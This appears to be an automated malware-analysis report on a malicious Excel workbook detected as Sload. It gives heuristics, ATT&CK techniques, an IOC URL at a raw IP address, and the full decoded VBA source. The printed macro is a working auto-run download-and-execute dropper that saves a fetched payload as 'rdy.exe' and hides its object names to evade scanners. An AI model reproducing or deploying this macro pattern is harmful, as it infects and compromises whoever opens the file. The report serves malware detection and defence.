MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The VBA macros contain critical heuristics indicating a download and execution of a file from a remote URL, specifically using the .ResponseBody and .SaveToFile methods. The Workbook_Open macro is designed to automatically execute upon opening the document, and the presence of CreateObject and CallByName calls further suggests malicious intent to run external code. The primary IOCs are the suspicious URLs identified in the extracted evidence.
Heuristics 9
-
ClamAV: Xls.Malware.Sload-7057784-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-7057784-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write Form17.DisableV1.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName UserForm2, "Show", VbMethod -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub WorkBook_open() -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://169.239.129.60/k1� Referenced by macro
- http://t2.symcb.com0Referenced by macro
- http://tl.symcd.com0&Referenced by macro
- http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
- http://tl.symcb.com/tl.crl0Referenced by macro
- https://www.thawte.com/cps0/Referenced by macro
- https://www.thawte.com/repository0WReferenced by macro
- http://tl.symcb.com/tl.crt0Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3102 bytes |
SHA-256: 2e267b5bb2df5bc6254a81cc26e343c9f1a17000b89986fad7a75696b3a71d28 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName UserForm2, "Show", VbMethod
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
#If RRRQUY2 Then
Dim BailoDHLAS5
Dim BailoDHLAS6
Dim BailoDHLAS7
Dim BailoDHLAS9
Dim BailoDHLAS8
Dim BailoDHLAS11
Dim BailoDHLAS12
#End If
#If Not RRRQUY2231 Then
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag)
Set Form17.DisableV1 = CreateObject(Form17.Label1.Tag)
#End If
End Sub
Attribute VB_Name = "Form17"
Attribute VB_Base = "0{370D6B2C-9521-4DB8-96A1-E90D82C599D4}{97B5F205-73AF-427F-9B67-0338F7EF2265}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public SubMainR1 As Object
Public DisableV1 As Object
Public SubMainR2 As Object
Public DisableV2 As Object
Public SubMainR3 As Object
Public DisableV3 As Object
Public Sub Label5_Click()
Dim BailoDHLAS5
DisableV1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim BailoDHLAS6
End Sub
Public Sub S1000()
End Sub
Public Sub frfr4()
End Sub
Attribute VB_Name = "Modu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub Attention()
Sheet1.Anykey
Dim BailoDHLAS4
Dim BailoDHLAS3
Form17.Label5_Click
Form17.DisableV1.Send
With Form17.SubMainR1
.Type = 1
End With
Form17.SubMainR1.Open
With Form17.SubMainR1
.write Form17.DisableV1.responseBody
End With
#If RRRQUY Then
Form17.SubMainR1.savetofile "rdy.e" & "xe", 2
#End If
ExecuteExcel4Macro Form17.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""On2"")"
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4A865ACC-F896-4E49-B36B-39D4DA87AC26}{37D04F0E-022D-4134-A1B1-28A91E75851D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub FUnt()
Dim rd1 As New Modu
rd1.Attention
End Sub
Private Sub UserForm_Initialize()
FUnt
Unload Me
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.